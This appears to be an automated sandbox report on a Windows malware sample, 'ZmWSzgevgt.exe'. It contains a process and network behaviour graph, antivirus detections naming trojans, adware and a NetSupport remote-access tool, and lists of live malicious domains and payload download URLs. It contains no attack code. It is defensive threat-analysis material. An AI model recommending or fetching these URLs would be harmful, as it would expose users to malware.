                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1354609 Sample: ZmWSzgevgt.exe Startdate: 06/12/2023 Architecture: WINDOWS Score: 64 185 sidemark.xyz 2->185 187 send.planewool.xyz 2->187 189 18 other IPs or domains 2->189 223 Snort IDS alert for network traffic 2->223 225 Antivirus detection for URL or domain 2->225 227 Antivirus detection for dropped file 2->227 231 8 other signatures 2->231 14 msiexec.exe 2->14         started        17 ZmWSzgevgt.exe 2 2->17         started        19 Windows Updater.exe 2->19         started        22 10 other processes 2->22 signatures3 229 Performs DNS queries to domains with low reputation 187->229 process4 dnsIp5 165 C:\Windows\Installer\MSIE2F.tmp, PE32 14->165 dropped 167 C:\Windows\Installer\MSID28A.tmp, PE32 14->167 dropped 169 C:\Windows\Installer\MSID0B4.tmp, PE32 14->169 dropped 175 109 other malicious files 14->175 dropped 24 msiexec.exe 14->24         started        29 msiexec.exe 14->29         started        31 msiexec.exe 14->31         started        41 2 other processes 14->41 171 C:\Users\user\AppData\...\ZmWSzgevgt.tmp, PE32 17->171 dropped 33 ZmWSzgevgt.tmp 23 18 17->33         started        201 allroadslimit.com 104.21.74.109 CLOUDFLARENETUS United States 19->201 173 C:\Windows\Temp\...\Windows Updater.exe, PE32 19->173 dropped 35 Windows Updater.exe 19->35         started        37 conhost.exe 22->37         started        39 conhost.exe 22->39         started        43 6 other processes 22->43 file6 process7 dnsIp8 203 pstbbk.com 157.230.96.32 DIGITALOCEAN-ASNUS United States 24->203 205 collect.installeranalytics.com 54.165.38.232 AMAZON-AESUS United States 24->205 149 2 other files (none is malicious) 24->149 dropped 235 Query firmware table information (likely to detect VMs) 24->235 45 taskkill.exe 24->45         started        151 4 other files (none is malicious) 29->151 dropped 47 taskkill.exe 29->47         started        49 taskkill.exe 29->49         started        51 taskkill.exe 29->51         started        153 2 other files (none is malicious) 31->153 dropped 207 sparksteam.site 104.21.52.223, 49705, 80 CLOUDFLARENETUS United States 33->207 209 sidemark.xyz 104.21.73.195, 49706, 80 CLOUDFLARENETUS United States 33->209 139 C:\Users\user\AppData\Local\...\is-04ME8.tmp, PE32 33->139 dropped 141 C:\Program Files (x86)\...\is-74O1B.tmp, PE32 33->141 dropped 143 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 33->143 dropped 53 setup.exe 2 33->53         started        211 dl.likeasurfer.com 104.21.32.100 CLOUDFLARENETUS United States 35->211 145 C:\ProgramData\AW Manager\...\v114.exe.part, PE32 35->145 dropped 147 C:\ProgramData\AW Manager\...\v113.exe.part, PE32 35->147 dropped 56 v113.exe 35->56         started        155 2 other files (none is malicious) 41->155 dropped file9 signatures10 process11 file12 58 conhost.exe 45->58         started        60 conhost.exe 47->60         started        62 conhost.exe 49->62         started        64 conhost.exe 51->64         started        119 C:\Users\user\AppData\Local\...\setup.tmp, PE32 53->119 dropped 66 setup.tmp 5 26 53->66         started        121 C:\Windows\Temp\MSI4CE0.tmp, PE32 56->121 dropped 123 C:\Windows\Temp\MSI4C62.tmp, PE32 56->123 dropped 125 C:\Windows\Temp\INA4B57.tmp, PE32 56->125 dropped 127 4 other files (3 malicious) 56->127 dropped 70 msiexec.exe 56->70         started        process13 dnsIp14 191 ambadevgroup.info 37.1.198.251 LEASEWEB-DE-FRA-10DE Ukraine 66->191 193 send.planewool.xyz 104.21.90.147, 49727, 80 CLOUDFLARENETUS United States 66->193 195 3 other IPs or domains 66->195 111 C:\Users\user\AppData\Local\Temp\...\idp.dll, PE32 66->111 dropped 113 C:\Users\user\AppData\Local\Temp\...\a3.exe, PE32 66->113 dropped 115 C:\Users\user\AppData\Local\Temp\...\a1.exe, PE32 66->115 dropped 117 2 other files (1 malicious) 66->117 dropped 72 a0.exe 2 66->72         started        75 a1.exe 66->75         started        file15 process16 file17 129 C:\Users\user\AppData\Local\Temp\...\a0.tmp, PE32 72->129 dropped 78 a0.tmp 26 23 72->78         started        131 C:\Users\user\AppData\Roaming\...\decoder.dll, PE32 75->131 dropped 133 C:\Users\user\AppData\...\Windows Updater.exe, PE32 75->133 dropped 135 C:\Users\user\AppData\Local\...\MSIF9EE.tmp, PE32 75->135 dropped 137 3 other files (2 malicious) 75->137 dropped 237 Multi AV Scanner detection for dropped file 75->237 82 msiexec.exe 75->82         started        signatures18 process19 file20 177 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 78->177 dropped 179 C:\Program Files (x86)\...\is-J9JTN.tmp, PE32 78->179 dropped 181 C:\Program Files (x86)\...\is-9GOQR.tmp, PE32+ 78->181 dropped 183 5 other files (2 malicious) 78->183 dropped 239 Obfuscated command line found 78->239 84 cmd.exe 1 78->84         started        86 cmd.exe 13 78->86         started        88 cmd.exe 1 78->88         started        90 wmiprvse.exe 17 78->90         started        signatures21 process22 dnsIp23 93 expand.exe 21 84->93         started        96 conhost.exe 84->96         started        98 chrome.exe 86->98         started        101 conhost.exe 86->101         started        103 reg.exe 1 1 88->103         started        106 conhost.exe 88->106         started        213 myptofgrtulo.info 95.142.47.11, 1203, 49718 VDSINA-ASRU Russian Federation 90->213 215 geo.netsupportsoftware.com 51.142.119.24, 49719, 80 MICROSOFT-CORP-MSN-AS-BLOCKUS United Kingdom 90->215 process24 dnsIp25 157 C:\...\f88670462385d642bd8a486306392759.tmp, PE32 93->157 dropped 159 C:\...\e6adbd27df47824481105a18183e1d5e.tmp, PE32 93->159 dropped 161 C:\...\cd2f845e419388478df81bc59730a20b.tmp, PE32 93->161 dropped 163 6 other files (5 malicious) 93->163 dropped 197 192.168.2.5, 1203, 443, 49703 unknown unknown 98->197 199 239.255.255.250 unknown Reserved 98->199 108 chrome.exe 98->108         started        233 Creates an undocumented autostart registry key 103->233 file26 signatures27 process28 dnsIp29 217 axsboe-campaign.com 172.67.213.153, 443, 49723, 49724 CLOUDFLARENETUS United States 108->217 219 aefd.nelreports.net 108->219 221 14 other IPs or domains 108->221

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  ZmWSzgevgt.exe30%ReversingLabsWin32.Trojan.OffLoader
                                  ZmWSzgevgt.exe100%AviraTR/Downloader.Gen
                                  SourceDetectionScannerLabelLink
                                  C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exe100%AviraPUA/Microleaves.A
                                  680af9.rbf (copy)0%ReversingLabs
                                  680aff.rbf (copy)0%ReversingLabs
                                  680b04.rbf (copy)54%ReversingLabsWin64.PUA.AdvWinMan
                                  C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\AdvancedWindowsManager.exe44%ReversingLabsWin64.Trojan.Microleaves
                                  C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\7EB1504\Windows Updater.exe5%ReversingLabs
                                  C:\AppData\Roaming\AdvancedWindowsManager\Windows Installer 5.0.3\install\decoder.dll0%ReversingLabs
                                  C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe54%ReversingLabsWin64.PUA.AdvWinMan
                                  C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe0%ReversingLabs
                                  C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-92M1P.tmp0%ReversingLabs
                                  C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-9GOQR.tmp0%ReversingLabs
                                  C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-J9JTN.tmp0%ReversingLabs
                                  C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-KD7U9.tmp0%ReversingLabs
                                  C:\Program Files (x86)\VxCXHgOKWFitaVL Corporation\is-PML8F.tmp0%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\078630d72d217d4d9885ece5b71fe988.tmp6%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\2041dcc7124af9419b0b672e9d7171f7.tmp5%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\4120bfd883d24a4daf0a8db223a7081f.tmp0%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\51ccd7e4634de4468d3b8ec370ae3220.tmp5%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\5d7fc0667d8a0e48a42ebd70bdd0c76a.tmp17%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\cd2f845e419388478df81bc59730a20b.tmp22%ReversingLabsWin32.PUA.Netsupportrat
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\d98380e50ba80f4fa3adba0346158290.tmp0%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmp3%ReversingLabs
                                  C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmp3%ReversingLabs
                                  C:\ProgramData\AW Manager\Windows Manager\updates\v113\v113.exe.part27%ReversingLabsWin32.Trojan.Microleaves
                                  C:\ProgramData\AW Manager\Windows Manager\updates\v114\v114.exe.part59%ReversingLabsWin32.Trojan.Generic
                                  C:\Users\user\AppData\Local\Temp\INAF75B.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIF8B5.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\MSIF9EE.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-0270L.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-53US7.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a0.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe83%ReversingLabsWin32.Trojan.Mamson
                                  C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a3.exe30%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-53US7.tmp\idp.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\_isetup\_iscrypt.dll0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\is-TMJSM.tmp\_isetup\_setup64.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\shi135F.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\shi13CD.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\shiF808.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\shiFA87.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\shiFB53.tmp0%ReversingLabs
                                  C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Updater.exe65%ReversingLabsWin32.Adware.RedCap
                                  C:\Users\user\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\decoder.dll0%ReversingLabs
                                  C:\Windows\Installer\MSI10B0.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI11F9.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1239.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1259.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI12C7.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1336.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1DA7.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1E63.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1E83.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1F30.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1F60.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI1FDF.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI208C.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI232D.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI234D.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5BA4.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5BF3.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5C23.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5C43.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5C73.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5D6E.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5DCD.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI5E0C.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6929.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6A82.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6AB2.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6BEB.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6CC8.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6CE8.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6D86.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6DC5.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6E53.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6E83.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6EA3.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6ED3.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6F03.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6F32.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI6F72.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI703E.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI71C6.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI731E.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI735E.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI738E.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI73CD.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI73FD.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI743D.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI7F4A.tmp0%ReversingLabs
                                  C:\Windows\Installer\MSI7F89.tmp0%ReversingLabs
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
                                  http://ocsp.suscerte.gob.ve00%URL Reputationsafe
                                  http://crl.dhimyotis.com/certignarootca.crl00%URL Reputationsafe
                                  http://www.chambersign.org10%URL Reputationsafe
                                  http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz00%URL Reputationsafe
                                  http://crl.ssc.lt/root-c/cacrl.crl00%URL Reputationsafe
                                  http://ca.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                                  http://www.suscerte.gob.ve/dpc00%URL Reputationsafe
                                  http://www.disig.sk/ca/crl/ca_disig.crl00%URL Reputationsafe
                                  https://www.remobjects.com/ps0%URL Reputationsafe
                                  http://policy.camerfirma.com00%URL Reputationsafe
                                  http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?0%URL Reputationsafe
                                  http://crl.ssc.lt/root-b/cacrl.crl00%URL Reputationsafe
                                  http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G0%URL Reputationsafe
                                  https://wwww.certigna.fr/autorites/0m0%URL Reputationsafe
                                  http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf00%URL Reputationsafe
                                  http://www.globaltrust.info00%URL Reputationsafe
                                  http://ac.economia.gob.mx/last.crl0G0%URL Reputationsafe
                                  http://crl.oces.trust2408.com/oces.crl00%URL Reputationsafe
                                  http://certs.oaticerts.com/repository/OATICA2.crl0%URL Reputationsafe
                                  http://certs.oati.net/repository/OATICA2.crt00%URL Reputationsafe
                                  http://www.accv.es000%URL Reputationsafe
                                  http://crl2.postsignum.cz/crl/psrootqca4.crl010%URL Reputationsafe
                                  http://web.ncdc.gov.sa/crl/nrcaparta1.crl0%URL Reputationsafe
                                  http://www.acabogacia.org00%URL Reputationsafe
                                  http://crl.securetrust.com/SGCA.crl00%URL Reputationsafe
                                  http://www.agesic.gub.uy/acrn/acrn.crl0)0%URL Reputationsafe
                                  http://www.rcsc.lt/repository00%URL Reputationsafe
                                  http://certs.oaticerts.com/repository/OATICA2.crt080%URL Reputationsafe
                                  http://ambadevgroup.info/load/1509/promo.exe~0%Avira URL Cloudsafe
                                  http://mysoftwareusa.info/stats/3/0/0100%Avira URL Cloudmalware
                                  https://dl.likeasurfer.com/updates/v113.exe&0%Avira URL Cloudsafe
                                  http://sidemark.xyz/0%Avira URL Cloudsafe
                                  https://www.innosetup.com/0%Avira URL Cloudsafe
                                  http://ambadevgroup.info/load/1509/promo.exet0%Avira URL Cloudsafe
                                  http://%s/testpage.htm0%Avira URL Cloudsafe
                                  https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598100%Avira URL Cloudmalware
                                  http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1658&a=2598&dn=416&spot=7&t=10%Avira URL Cloudsafe
                                  http://ambadevgroup.info/load/1509/promo.exeD0%Avira URL Cloudsafe
                                  https://sizestep.online/tracker/thank_you.php?trk=2598100%Avira URL Cloudphishing
                                  http://send.planewool.xyz/track_polos.php?tim=1701869569&rcc=US&c=2598&p=0.9100%Avira URL Cloudphishing
                                  https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=1701869569c0%Avira URL Cloudsafe
                                  http://mysoftwareusa.info/archives/7100%Avira URL Cloudmalware
                                  http://mysoftwareusa.info/stats/3/1/0100%Avira URL Cloudmalware
                                  http://sparksteam.site/100%Avira URL Cloudmalware
                                  http://mysoftwareusa.info/archives/5100%Avira URL Cloudmalware
                                  https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=170186956970%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=17018695690%Avira URL Cloudsafe
                                  http://127.0.0.10%Avira URL Cloudsafe
                                  https://www.hulkisbulish.com/updates.txt0%Avira URL Cloudsafe
                                  https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic0%Avira URL Cloudsafe
                                  https://allroadslimit.com/0%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1661&a=2598&dn=419&spot=3&t=10%Avira URL Cloudsafe
                                  https://www.inlogbrowser.com/pp.txt0%Avira URL Cloudsafe
                                  https://repository.tsp.zetes.com00%Avira URL Cloudsafe
                                  https://advancedmanager.io/eula0%Avira URL Cloudsafe
                                  https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i100%Avira URL Cloudmalware
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1666&a=2598&dn=428&spot=6&t=0%Avira URL Cloudsafe
                                  https://false.apparelsilver.xyz/0%Avira URL Cloudsafe
                                  http://ambadevgroup.info/load/1509/promo.exea620%Avira URL Cloudsafe
                                  http://html4/loose.dtd0%Avira URL Cloudsafe
                                  https://dl.likeasurfer.com//0%Avira URL Cloudsafe
                                  http://sparksteam.site/Q100%Avira URL Cloudmalware
                                  http://sparksteam.site/pill.phpSm100%Avira URL Cloudmalware
                                  http://.css0%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1658&a=2598&dn=416&spot=7&t=0%Avira URL Cloudsafe
                                  https://dl.likeasurfer.com/70%Avira URL Cloudsafe
                                  http://www.agenment.clo0%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=331&a=2598&dn=244&spot=2&t=170%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1662&a=2598&dn=420&spot=5&t=0%Avira URL Cloudsafe
                                  http://send.planewool.xyz/track_uki.php?tim=1701869569&rcc=US&c=2598&p=0.92100%Avira URL Cloudphishing
                                  http://.jpg0%Avira URL Cloudsafe
                                  http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=no&o=1627&a=2598&dn=286&spot=1&t=10%Avira URL Cloudsafe
                                  NameIPActiveMaliciousAntivirus DetectionReputation
                                  sparksteam.site
                                  104.21.52.223
                                  truetrue
                                    unknown
                                    send.planewool.xyz
                                    104.21.90.147
                                    truetrue
                                      unknown
                                      geo.netsupportsoftware.com
                                      51.142.119.24
                                      truefalse
                                        high
                                        accounts.google.com
                                        172.253.115.84
                                        truefalse
                                          high
                                          sidemark.xyz
                                          104.21.73.195
                                          truetrue
                                            unknown
                                            myptofgrtulo.info
                                            95.142.47.11
                                            truetrue
                                              unknown
                                              allroadslimit.com
                                              104.21.74.109
                                              truefalse
                                                unknown
                                                axsboe-campaign.com
                                                172.67.213.153
                                                truetrue
                                                  unknown
                                                  ambadevgroup.info
                                                  37.1.198.251
                                                  truetrue
                                                    unknown
                                                    kapetownlink.com
                                                    159.223.29.40
                                                    truetrue
                                                      unknown
                                                      www.agenment.cloud
                                                      185.23.108.224
                                                      truefalse
                                                        unknown
                                                        pstbbk.com
                                                        157.230.96.32
                                                        truetrue
                                                          unknown
                                                          collect.installeranalytics.com
                                                          54.165.38.232
                                                          truefalse
                                                            high
                                                            dl.likeasurfer.com
                                                            104.21.32.100
                                                            truefalse
                                                              unknown
                                                              www.google.com
                                                              172.253.63.105
                                                              truefalse
                                                                high
                                                                part-0012.t-0009.t-msedge.net
                                                                13.107.246.40
                                                                truefalse
                                                                  unknown
                                                                  false.apparelsilver.xyz
                                                                  172.67.198.151
                                                                  truetrue
                                                                    unknown
                                                                    clients.l.google.com
                                                                    142.251.111.100
                                                                    truefalse
                                                                      high
                                                                      c.msn.com
                                                                      unknown
                                                                      unknownfalse
                                                                        high
                                                                        111.t.keepitpumpin.io
                                                                        unknown
                                                                        unknowntrue
                                                                          unknown
                                                                          clients2.google.com
                                                                          unknown
                                                                          unknownfalse
                                                                            high
                                                                            114.t.keepitpumpin.io
                                                                            unknown
                                                                            unknowntrue
                                                                              unknown
                                                                              110.t.keepitpumpin.io
                                                                              unknown
                                                                              unknowntrue
                                                                                unknown
                                                                                ecn.dev.virtualearth.net
                                                                                unknown
                                                                                unknownfalse
                                                                                  high
                                                                                  browser.events.data.msn.com
                                                                                  unknown
                                                                                  unknownfalse
                                                                                    high
                                                                                    clients1.google.com
                                                                                    unknown
                                                                                    unknownfalse
                                                                                      high
                                                                                      assets.msn.com
                                                                                      unknown
                                                                                      unknownfalse
                                                                                        high
                                                                                        113.t.keepitpumpin.io
                                                                                        unknown
                                                                                        unknowntrue
                                                                                          unknown
                                                                                          www.msn.com
                                                                                          unknown
                                                                                          unknownfalse
                                                                                            high
                                                                                            aefd.nelreports.net
                                                                                            unknown
                                                                                            unknowntrue
                                                                                              unknown
                                                                                              231005002055611.bcn.lca62.shop
                                                                                              unknown
                                                                                              unknowntrue
                                                                                                unknown
                                                                                                login.microsoftonline.com
                                                                                                unknown
                                                                                                unknownfalse
                                                                                                  high
                                                                                                  112.t.keepitpumpin.io
                                                                                                  unknown
                                                                                                  unknowntrue
                                                                                                    unknown
                                                                                                    NameMaliciousAntivirus DetectionReputation
                                                                                                    http://mysoftwareusa.info/stats/3/0/0true
                                                                                                    • Avira URL Cloud: malware
                                                                                                    unknown
                                                                                                    https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=00000000000000000000000000000000000000006416C752B8false
                                                                                                      high
                                                                                                      http://geo.netsupportsoftware.com/location/loca.aspfalse
                                                                                                        high
                                                                                                        https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i&c=5306757&pl=0x03&pb=1&px=2598true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://mysoftwareusa.info/archives/5true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://mysoftwareusa.info/archives/7true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://mysoftwareusa.info/stats/3/1/0true
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://false.apparelsilver.xyz/ar.php?d=inno&r=offer_execution&rk=yes&o=1627&a=2598&dn=286&spot=1&t=1701869569false
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                                        http://ambadevgroup.info/load/1509/promo.exetsetup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://%s/testpage.htmwininet.dllwmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        low
                                                                                                        http://www.certplus.com/CRL/class3.crl0a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://ocsp.suscerte.gob.ve0a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://ambadevgroup.info/load/1509/promo.exe~setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crl.dhimyotis.com/certignarootca.crl0a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        unknown
                                                                                                        http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2318044040.00000000043EF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317443500.00000000043EE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.chambersign.org1a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://%s/testpage.htmwmiprvse.exe, 0000000E.00000002.4556173624.000000006BEE0000.00000002.00000001.01000000.00000017.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          low
                                                                                                          http://repository.swisssign.com/0a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://dl.likeasurfer.com/updates/v113.exe&Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://crl.ssc.lt/root-c/cacrl.crl0a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://ca.disig.sk/ca/crl/ca_disig.crl0a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.suscerte.gob.ve/dpc0a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://assets.msn.com/weathermapdata/1/static/logo/chromecache_658.19.drfalse
                                                                                                              high
                                                                                                              https://microleaves.com/privacy-policyca1.exe, 00000014.00000003.2312873578.00000000043CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://www.disig.sk/ca/crl/ca_disig.crl0a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
